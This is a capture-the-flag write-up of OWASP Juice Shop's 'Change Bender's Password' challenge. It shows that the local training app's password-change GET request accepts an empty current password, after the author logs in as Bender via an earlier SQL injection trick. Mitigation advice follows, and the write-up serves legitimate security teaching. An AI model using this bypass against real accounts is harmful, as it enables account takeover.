Hacking OWASP’s Juice Shop Pt. 59: Change Bender’s Password

Challenge: 

Name: Change Bender’s Password

Description: Change Bender’s password into slurmCl4ssic without using SQL Injection or Forgot Password.

Difficulty: 5 star

Category: Broken Authentication

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-authentication.html

Tools used:

Burp Suite, FoxyProxy

Resources used:

None.

Methodology: 

With the expanded description being of very little obvious assistance, I opted to learn how the password changing mechanism worked using an account for which I already had the password.

[Screenshot: Burp Suite Repeater, Request tab. The password-change request is a GET to /rest/user/… HTTP/1.1 on Host: localhost:3000, sent by Firefox 78 on Linux with Accept: application/json, text/plain, */*. The current and new passwords appear in cleartext in the request line.]

I was a little surprised to see that the passwords were being passed in cleartext like this, but it being Juice Shop that wasn’t exactly shocking. Now that I knew roughly how the mechanism worked, I logged in as Bender using the SQL injection trick from the Login Bender challenge and started probing. I could have done this with the admin account, but on the off chance I got lucky on my first couple of attempts I didn’t want to waste that luck on the wrong account. After all, knowing that SQL injection was disallowed for this challenge, there were only a few possible weaknesses to test.

[Screenshot: Burp Suite Repeater, request and response. Request: GET /rest/user/… HTTP/1.1 to Host: localhost:3000 with the same Firefox 78 headers as above, plus Accept-Language: en-US, Accept-Encoding: gzip, deflate and an Authorization: Bearer header carrying Bender's session JWT (its payload includes "email":"bender@juice-sh.op" and the account's stored password hash). The current password in the request is deliberately wrong.

Response: HTTP/1.1 401 Unauthorized, Content-Type: text/html; charset=utf-8, Date: Wed, 09 Dec 2020 18:11:32 GMT, Connection: close, with the headers Access-Control-Allow-Origin: *, X-Content-Type-Options: nosniff, X-Frame-Options: SAMEORIGIN and Feature-Policy: payment 'self'. Body: "… password is not correct".]

OK, so using the wrong current password yields a 401 response code. What about leaving the current password field empty?

[Screenshot: Burp Suite Repeater, request and response. Request: the same GET /rest/user/… HTTP/1.1 request (Authorization: Bearer JWT, Referer: http://localhost:3000/, Cookie: language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=…; token=…), this time with the current password left empty.

Response: HTTP/1.1 200 OK, Content-Type: application/json; charset=utf-8, Content-Length: 352, Date: Wed, 09 Dec 2020 18:12 GMT, Connection: close, same security headers as before. Body: the updated user record, reproduced here with the fields legible in the screenshot:

  "email": "bender@juice-sh.op",
  "password": "<32-hex-character hash of the new password>",
  "role": "customer",
  "lastLoginIp": "undefined",
  "profileImage": "assets/public/images/uploads/default.svg",
  "isActive": true,
  "createdAt": "2020-12-09T14:44:17.317Z",
  "updatedAt": "2020-12-09T18:12:11.824Z",
  "deletedAt": null

(The username, deluxeToken and totpSecret fields are also present, but their values are not legible.) Note that the response hands the caller the stored password hash.]

Success!

You successfully solved a challenge: Change Bender's Password (Change Bender's password into slurmCl4ssic without using SQL Injection or Forgot Password.)

Prevention and Mitigation Strategies:

Don't carry passwords in a GET query string: they land in cleartext in browser history, proxy logs and server access logs. Send the change-password request as a POST with the credentials in the body, over TLS. On the server side, treat the current password as mandatory: reject the request when the field is missing or empty rather than skipping the comparison, and verify the supplied value against the stored hash (with a constant-time comparison) before updating the user record. The probes above show the failure mode exactly: a wrong current password is refused with a 401, but an empty one is accepted, so the check is only being applied when a value happens to be present. Finally, don't echo the user's password hash back in the response as the 200 reply above does; return only the fields the client needs.

Lessons Learned and Things Worth Mentioning: 

My strategy here was basically to poke the server with a stick until it let me do what I wanted to do. That appears to be a valid strategy!
